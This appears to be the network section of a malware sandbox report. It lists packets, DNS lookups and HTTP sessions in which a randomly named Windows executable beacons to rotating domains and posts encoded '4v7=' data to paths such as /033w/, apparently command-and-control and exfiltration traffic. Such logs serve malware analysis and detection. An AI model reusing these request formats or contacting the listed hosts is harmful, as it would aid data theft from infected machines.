                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159046888 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159095049 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159123898 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159151077 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:54.542108059 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:54.709352970 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.134424925 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.134593964 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.560533047 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.680747986 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.680977106 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.689892054 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:55.810107946 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.792366982 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.792649984 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.793524027 CET4998880192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:57.913439989 CET8049988103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.745424986 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.865408897 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.865777016 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:03.942928076 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:04.062799931 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153470039 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153528929 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153572083 CET8050007185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153666973 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.153667927 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:05.448426008 CET5000780192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.466707945 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.586781979 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.586879015 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.598787069 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:06.718930006 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867351055 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867394924 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867470026 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.867997885 CET8050016185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:07.868172884 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:08.104713917 CET5001680192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.123003006 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.243242979 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.243340015 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.257201910 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377377033 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377418995 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377455950 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377484083 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377537966 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377567053 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377652884 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377681017 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:09.377713919 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522846937 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522866011 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522876978 CET8050024185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.523000956 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.760982990 CET5002480192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.779508114 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.899266958 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.899466991 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.907931089 CET5003080192.168.2.4185.68.108.243
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:12.027589083 CET8050030185.68.108.243192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179289103 CET8050030185.68.108.243192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 04:08:03.851908922 CET | 192.168.2.4 | 1.1.1.1 | 0xb04 | Standard query (0) | www.techforcreators.live | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:04.838816881 CET | 192.168.2.4 | 1.1.1.1 | 0xb04 | Standard query (0) | www.techforcreators.live | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:21.201204062 CET | 192.168.2.4 | 1.1.1.1 | 0xd085 | Standard query (0) | www.llmsforrobot.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:22.198174953 CET | 192.168.2.4 | 1.1.1.1 | 0xd085 | Standard query (0) | www.llmsforrobot.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:36.467350960 CET | 192.168.2.4 | 1.1.1.1 | 0x308c | Standard query (0) | www.yous.website | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:51.373313904 CET | 192.168.2.4 | 1.1.1.1 | 0xf518 | Standard query (0) | www.mirenzhibo.net | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:07.332532883 CET | 192.168.2.4 | 1.1.1.1 | 0x4ba4 | Standard query (0) | www.amorinc.click | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:15.686186075 CET | 192.168.2.4 | 1.1.1.1 | 0x7bb8 | Standard query (0) | www.sob.rip | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:30.866060019 CET | 192.168.2.4 | 1.1.1.1 | 0xa53c | Standard query (0) | www.aihuzhibo.net | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:46.857722998 CET | 192.168.2.4 | 1.1.1.1 | 0x7ba6 | Standard query (0) | www.furrcali.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:10:02.810803890 CET | 192.168.2.4 | 1.1.1.1 | 0x752b | Standard query (0) | www.accusolution.pro | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:10:18.186196089 CET | 192.168.2.4 | 1.1.1.1 | 0x8974 | Standard query (0) | www.seamarket.shop | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:10:19.182872057 CET | 192.168.2.4 | 1.1.1.1 | 0x8974 | Standard query (0) | www.seamarket.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 04:08:04.921974897 CET | 1.1.1.1 | 192.168.2.4 | 0xb04 | No error (0) | www.techforcreators.live |  | 52.223.13.41 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:04.975923061 CET | 1.1.1.1 | 192.168.2.4 | 0xb04 | No error (0) | www.techforcreators.live |  | 52.223.13.41 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:22.255072117 CET | 1.1.1.1 | 192.168.2.4 | 0xd085 | No error (0) | www.llmsforrobot.xyz |  | 192.30.252.154 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:22.335341930 CET | 1.1.1.1 | 192.168.2.4 | 0xd085 | No error (0) | www.llmsforrobot.xyz |  | 192.30.252.154 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:36.953010082 CET | 1.1.1.1 | 192.168.2.4 | 0x308c | No error (0) | www.yous.website |  | 209.74.79.40 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:08:51.939840078 CET | 1.1.1.1 | 192.168.2.4 | 0xf518 | No error (0) | www.mirenzhibo.net |  | 202.95.11.110 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:07.634224892 CET | 1.1.1.1 | 192.168.2.4 | 0x4ba4 | Name error (3) | www.amorinc.click | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:16.623874903 CET | 1.1.1.1 | 192.168.2.4 | 0x7bb8 | No error (0) | www.sob.rip | 94950.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 04:09:16.623874903 CET | 1.1.1.1 | 192.168.2.4 | 0x7bb8 | No error (0) | 94950.bodis.com |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:31.406574011 CET | 1.1.1.1 | 192.168.2.4 | 0xa53c | No error (0) | www.aihuzhibo.net |  | 192.186.58.31 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:09:47.579477072 CET | 1.1.1.1 | 192.168.2.4 | 0x7ba6 | No error (0) | www.furrcali.xyz |  | 103.106.67.112 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:10:03.721479893 CET | 1.1.1.1 | 192.168.2.4 | 0x752b | No error (0) | www.accusolution.pro | accusolution.pro |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 04:10:03.721479893 CET | 1.1.1.1 | 192.168.2.4 | 0x752b | No error (0) | accusolution.pro |  | 185.68.108.243 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:10:19.332890034 CET | 1.1.1.1 | 192.168.2.4 | 0x8974 | No error (0) | www.seamarket.shop |  | 52.223.13.41 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 04:10:19.332914114 CET | 1.1.1.1 | 192.168.2.4 | 0x8974 | No error (0) | www.seamarket.shop |  | 52.223.13.41 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 52.223.13.41 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:05.062185049 CET | 431 | OUT | GET /7hkm/?4v7=PTrvXdcgSMfdhotioq8pnUkjNlxy61myV8F0WPH7Z2Bq/45rtMPjYLxLqkAieyptPF2XeHF9OCzJ15KQyhm6FHL/8EngdtV8gwYC3BL3/d+rtru4um4WJso=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.techforcreators.live
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:08:06.153362036 CET | 370 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:08:05 GMT
                                                                                                                                                                                                                                              content-length: 249
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4v7=PTrvXdcgSMfdhotioq8pnUkjNlxy61myV8F0WPH7Z2Bq/45rtMPjYLxLqkAieyptPF2XeHF9OCzJ15KQyhm6FHL/8EngdtV8gwYC3BL3/d+rtru4um4WJso=&pRel=chN0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49754 | 192.30.252.154 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:22.389950037 CET | 701 | OUT | POST /033w/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Referer: http://www.llmsforrobot.xyz/033w/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=pbX4THZFz/nfHXtr5VlTr04CF9pxNcIFBvV5TEyO5ElpyR7IDk90y4iuA2PTkXva4Fxm6/BDGDCn5iauyQa2ugWIJ0DBWtapFDodVKTdW+gKKlJo+EzlgvoAGRpsZAFH4Q2opdgH8nHyU77lXp8F78G2Ge6ip4HoizAk5wymNIBtoj02gD0DLVhw6Mfi1GT+hw==
Dec 23, 2024 04:08:23.474469900 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head> <title>Unicorn! &middot; GitHub</title> <style type="text/css" media="screen"> body { background-color: #f1f1f1; margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } .container { margin: 50px auto 40px auto; width: 600px; text-align: center; } a { color: #4183c4; text-decoration: none; } a:hover { text-decoration: underline; } h1 { letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px; text-shadow: 0 1px 0 #fff; } p { color: rgba(0, 0, 0, 0.5); margin: 10px 0 10px; font-size: 18px; font-weight: 200; line-heig
Dec 23, 2024 04:08:23.474647045 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: ht: 1.6em;} ul { list-style: none; margin: 25px 0; padding: 0; } li { display: table-cell; font-weight: bold; width: 1%; } .logo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49760 | 192.30.252.154 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:25.051013947 CET | 721 | OUT | POST /033w/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Referer: http://www.llmsforrobot.xyz/033w/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:08:26.138079882 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head> <title>Unicorn! &middot; GitHub</title> <style type="text/css" media="screen"> body { background-color: #f1f1f1; margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } .container { margin: 50px auto 40px auto; width: 600px; text-align: center; } a { color: #4183c4; text-decoration: none; } a:hover { text-decoration: underline; } h1 { letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px; text-shadow: 0 1px 0 #fff; } p { color: rgba(0, 0, 0, 0.5); margin: 10px 0 10px; font-size: 18px; font-weight: 200; line-heig


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49766 | 192.30.252.154 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:27.709068060 CET | 10803 | OUT | POST /033w/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Referer: http://www.llmsforrobot.xyz/033w/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Data Ascii: 4v7= [TRUNCATED]
Dec 23, 2024 04:08:28.793070078 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head> <title>Unicorn! &middot; GitHub</title> <style type="text/css" media="screen"> body { background-color: #f1f1f1; margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } .container { margin: 50px auto 40px auto; width: 600px; text-align: center; } a { color: #4183c4; text-decoration: none; } a:hover { text-decoration: underline; } h1 { letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px; text-shadow: 0 1px 0 #fff; } p { color: rgba(0, 0, 0, 0.5); margin: 10px 0 10px; font-size: 18px; font-weight: 200; line-heig
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793421030 CET1236INData Raw: 32 42 4e 6a 6f 78 30 54 4c 76 74 72 2b 70 66 43 79 41 57 76 37 53 4f 4c 39 31 47 4a 56 6c 2b 5a 4c 7a 33 33 68 34 36 34 44 74 6b 41 49 48 54 47 6d 46 65 31 55 53 4b 79 57 4e 46 49 59 6d 43 6b 76 76 31 70 61 38 76 35 5a 4c 42 6e 44 70 64 56 6c 64
                                                                                                                                                                                                                                              Data Ascii: 2BNjox0TLvtr+pfCyAWv7SOL91GJVl+ZLz33h464DtkAIHTGmFe1USKyWNFIYmCkvv1pa8v5ZLBnDpdVld30Yj1ZYARIc1ScAcYCwHBinMYUFepS4xeRViH7rGmCAhsBEU2OQPJCSJNtnJqxV8sKC8tLT9la7aQz3y4kdBQiTjyFNUpBzFp3hABXeDgewEEVQiZkoMDWWuPOgX9wNAb9/44dKDlk9s6EGRafyGnpZCJFI/RpA+2
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.793457985 CET1236INData Raw: 59 53 69 52 46 62 49 68 34 48 49 68 46 42 65 67 73 63 53 51 49 36 74 6a 47 79 63 55 4a 4a 31 72 2b 32 6a 55 4d 2b 62 45 55 42 75 48 45 4c 53 51 2b 56 36 37 78 58 61 4a 70 54 4f 35 49 72 67 51 53 57 47 65 48 53 4f 61 73 52 7a 68 58 69 45 38 6a 31
                                                                                                                                                                                                                                              Data Ascii: YSiRFbIh4HIhFBegscSQI6tjGycUJJ1r+2jUM+bEUBuHELSQ+V67xXaJpTO5IrgQSWGeHSOasRzhXiE8j1aQIBZKInVLMRjVWhhqVQcYCLMJJREA4VTDESE9uQAg9wK3hBiUGOj7Thw8KEU0W7UjMQUZSAKs/SR0DpBMYkb8IFQp3qLYrIZ0UUA6YwAsh5A3kYVdDArEgiIvHnCRcUhaEzCpCMcyml6r5/WeIBI4RVYCgyFbxHC
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:28.913270950 CET1236INData Raw: 53 44 5a 41 43 61 52 57 42 59 75 4e 4d 79 6c 62 69 6c 34 6b 46 5a 64 45 4e 6f 42 4b 50 42 66 45 44 63 53 6a 4a 30 51 6b 54 69 38 48 36 63 59 69 4e 48 39 42 5a 47 4e 52 49 52 63 56 6f 6d 74 74 37 79 38 76 4c 65 32 61 61 4f 58 65 5a 30 53 68 6f 31
                                                                                                                                                                                                                                              Data Ascii: SDZACaRWBYuNMylbil4kFZdENoBKPBfEDcSjJ0QkTi8H6cYiNH9BZGNRIRcVomtt7y8vLe2aaOXeZ0Sho1hs3wGQjtrkb3YysWTXvFdn2CicdmEJNjQpi3inoD8T31kJwtlCIi82SMP05JhdFgfRstXJzA5FXTfoSvQWfThDW24XKh7sIkEG1kqsrAdFwyteXn5ecEEOwyeEJFkIjKlQIz0V3IGHUSkqbb8Dpq/aP2i92uVnLgU


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49772 | 192.30.252.154 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:30.362442017 CET | 427 | OUT | GET /033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF+E3DMV6CvFnNkvZwHFDq3DsFBZ82/i3KTvXvlfgnzlAmNdsBQySpwa+g3edi3aCFGjCcomWBBYIDruBe4sqSy428ijZjbg=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:08:31.454972982 CET | 553 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                              Server: GitHub.com
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:31 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                                              Location: http://llmsforrobot.xyz/033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF+E3DMV6CvFnNkvZwHFDq3DsFBZ82/i3KTvXvlfgnzlAmNdsBQySpwa+g3edi3aCFGjCcomWBBYIDruBe4sqSy428ijZjbg=&pRel=chN0
                                                                                                                                                                                                                                              X-GitHub-Request-Id: 21C8:186F5B:4594E2C:4CD1E16:6768D42F
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49788 | 209.74.79.40 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:37.136024952 CET | 689 | OUT | POST /sd58/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.yous.website
                                                                                                                                                                                                                                              Referer: http://www.yous.website/sd58/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=ndot/dTus2/h3shn38MZ/O/nwYu7NEJAsDQ0wZIuHYVp3hGpCCzKqr+wYwbZv6B5uDN6qHmbQC6rhfyxyB7vyMliKIc9ZWakhGQb/zlJIo//lTDj+I+NJP2qU8qogcgzBr/B8N89nFJsGvxqwYYGengVYZFxIggI18tvYkBUin5p2omodhQmMRFBsLWc7U7ihA==
Dec 23, 2024 04:08:38.333717108 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:38 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
